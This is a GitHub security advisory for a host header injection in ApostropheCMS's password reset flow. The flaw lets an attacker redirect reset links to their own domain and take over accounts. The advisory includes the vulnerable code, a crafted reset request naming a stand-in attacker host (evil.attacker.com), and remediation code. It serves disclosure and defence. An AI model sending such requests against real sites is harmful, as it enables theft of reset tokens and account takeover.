Skip to content

Apostrophe has a Weak Password Recovery Mechanism for Forgotten Password and Improper Input Validation

High severity GitHub Reviewed Published May 13, 2026 in apostrophecms/apostrophe • Updated May 14, 2026

Package

npm apostrophe (npm)

Affected versions

<= 4.29.0

Patched versions

None

Description

Summary

ApostropheCMS's password reset flow constructs the reset URL using req.hostname,
which is derived directly from the attacker-controlled HTTP Host header when
apos.baseUrl is not explicitly configured. An unauthenticated attacker who knows
a victim's email address can send a crafted reset request that causes the application
to email the victim a reset link pointing to the attacker's domain. When the victim
clicks the link, the valid reset token is delivered to the attacker, enabling full
account takeover.

Affected Component

modules/@apostrophecms/login/index.jsresetRequest route
Precondition: passwordReset: true is set and apos.baseUrl is not configured.

Vulnerability Details

The setPrefixUrls middleware (i18n layer) builds req.baseUrl using req.hostname:

// Simplified from i18n middleware
req.baseUrl = `${req.protocol}://${req.hostname}`;
req.absoluteUrl = req.baseUrl + req.url;

The resetRequest handler then passes this tainted value directly into URL construction:

const parsed = new URL(
  req.absoluteUrl,           // ← tainted by attacker's Host header
  self.apos.baseUrl
    ? undefined
    : `${req.protocol}://${req.hostname}${port}`  // ← also tainted
);
parsed.pathname = '/login';
parsed.searchParams.append('reset', reset);   // real, valid token
parsed.searchParams.append('email', user.email);
await self.email(..., { url: parsed.toString() }, ...);
// Email sent to victim with URL pointing to attacker-controlled domain

When apos.baseUrl is configured, it is used unconditionally and the attacker's
Host header is ignored — that path is not vulnerable.

Attack Scenario

  1. Attacker identifies a valid user email (e.g. from the site's public interface).
  2. Attacker sends:
   POST /api/v1/login/reset-request
   Host: evil.attacker.com
   Content-Type: application/json

   {"email": "victim@example.com"}
  1. The application emails the victim:
   Click here to reset your password:
   http://evil.attacker.com/login?reset=TOKEN&email=victim@example.com
  1. Victim clicks the link; attacker's server captures TOKEN.
  2. Attacker calls the real target's reset endpoint with the captured token and
    sets a new password — full account takeover.

Preconditions

  • passwordReset: true configured in login module options (opt-in)
  • apos.baseUrl is not set (common in development and some production deployments)
  • Attacker knows or can enumerate a valid account email

Impact

Full account takeover of any account whose email address is known to the attacker.
No authentication or interaction beyond sending a single HTTP request is required
from the attacker. The victim need only click a link in a legitimate-looking
password reset email from their own site.

Remediation

Operators (immediate): Always set apos.baseUrl in your configuration:

// app.js or module configuration
modules: {
  '@apostrophecms/express': {
    options: {
      baseUrl: 'https://yourdomain.com'
    }
  }
}

Framework fix (recommended): The resetRequest route should refuse to proceed
if apos.baseUrl is not configured, rather than falling back to the tainted
req.hostname. Example:

// In resetRequest handler
if (!self.apos.baseUrl) {
  throw self.apos.error(
    'invalid',
    'apos.baseUrl must be configured to enable password reset'
  );
}
const parsed = new URL(self.loginUrl(), self.apos.baseUrl);

This eliminates the attacker-controlled input entirely from the URL construction path.

References

References

@boutell boutell published to apostrophecms/apostrophe May 13, 2026
Published to the GitHub Advisory Database May 14, 2026
Reviewed May 14, 2026
Last updated May 14, 2026

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
None
User interaction
Required
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

EPSS score

Weaknesses

Improper Input Validation

The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. Learn more on MITRE.

Weak Password Recovery Mechanism for Forgotten Password

The product contains a mechanism for users to recover or change their passwords without knowing the original password, but the mechanism is weak. Learn more on MITRE.

CVE ID

CVE-2026-45013

GHSA ID

GHSA-gf43-24g3-5hw2

Source code

Credits

Loading Checking history
See something to contribute? Suggest improvements for this vulnerability.